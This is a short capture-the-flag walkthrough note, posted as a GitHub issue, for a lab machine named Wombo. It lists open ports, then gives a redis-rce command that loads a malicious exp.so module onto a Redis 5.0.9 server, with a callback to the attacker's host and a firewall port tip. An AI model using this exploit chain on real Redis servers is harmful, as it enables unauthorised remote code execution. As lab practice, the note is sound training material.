search

WDavid404 / PG-Box

PG box workthough note
0 stars 0 forks source link

Wombo (easy) #7

Open WDavid404 opened 4 months ago

WDavid404 commented 4 months ago

Keypoints:

WDavid404 commented 4 months ago 
PORT      STATE  SERVICE    REASON         VERSION
22/tcp    open   ssh        syn-ack ttl 61 OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
80/tcp    open   http       syn-ack ttl 61 nginx 1.10.3
6379/tcp  open   redis      syn-ack ttl 61 Redis key-value store 5.0.9
8080/tcp  open   http-proxy syn-ack ttl 61
27017/tcp open   mongodb    syn-ack ttl 61 MongoDB 4.0.18

80, 8080/port --> didn't find useful info...

searchsploit nginx 1.10 / MongoDB 4.0 / Redis --> No info google them --> Redis 5.0.9 exploit --> https://github.com/Ridter/redis-rce

Get exp.so file from URL below (The exp.so is a malicious redis module which we going to load on the target redis server. ) https://github.com/n0b0dyCN/redis-rogue-server/blob/master/exp.so

python3 redis-rce.py -r 192.168.237.69 -L 192.168.45.192 -P 80 -f exp.so
(Note: Must assign -P as 80 or 6379, otherwise, the traffice would be blocked by firewall) image